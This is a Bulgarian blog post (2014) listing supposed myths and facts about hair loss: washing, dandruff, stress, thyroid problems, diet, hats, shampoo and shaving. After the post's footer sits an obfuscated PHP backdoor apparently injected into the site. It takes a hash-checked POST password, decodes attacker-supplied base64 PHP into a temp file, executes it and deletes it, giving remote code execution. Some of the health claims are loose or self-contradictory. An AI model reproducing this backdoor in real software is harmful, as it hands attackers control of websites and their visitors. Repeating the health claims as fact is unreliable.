Косопадът: Кое е вярно и кое – не | Косопад

Косопадът: Кое е вярно и кое – не

Нека разгледаме някои много популярни митове за косопада и да видим какво мислят специалистите за тях – дали са истина или не.

kosopad-mitove

1. Мийте косата всеки ден. Ежедневното миене помага за падането на онези косми, които са в такава фаза и така или иначе ще паднат. Използвайте добър, нежен шампоан . Важното е да не позволявате на мазнината да съсипе мекотата и блясъка на косата ви.
2. Пърхот и себорея. Има много проблеми, свързани с косата, които могат да предизвикат силен косопад, ако не се получава правилна грижа. Два от най- популярните са пърхот и себорея.
3. Виновен е стресът. Без съмнение, стресът може да причини косопад. Стресова ситуация може да увеличи секрецията на андрогенни хормони, които причиняват падане на косата. При хората, които имат косопад поради тази причина, е защото космените фоликули са по- чувствителни към тези хормони.

4. Проблеми с щитовидната жлеза. Често тези заболявания, свързани с щитовидната жлеза, са съпроводени с косопад. Получава се, защото дехидротестостерона действа срещу космените фоликули и спира растежа на косата.

kosopad-chetka
5. Лошо хранене. Много често косопадът е предизвикан от неправилно хранене или дефицит на желязо. Здравословното хранене ни помага да имаме и здрава коса.
6. Шапки. Използването на шапки, кърпи и пр, увеличават изпотяването на скалпа и улесняват производството на мазнина, същата, която се произвежда при себореята. Би могла да предизвика косопад, ако не се полагат съответните грижи.
7. Шампоанът спира косопада. Ако започнете правилно третиране в началото, косопадът може да бъде спрян. Важно е да разберете, че причинителят не е някакво заболяване
8. Бръснете = силна коса. Мит е, че ако си бръснете косата, тя ще стане по- силна и здрава. Няма никакви научни доказателства за това твърдение. Бръсненето не решава проблем, който е свързан с вътрешността на косъма, под кожата.

23. юни 2014 13:02:15 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}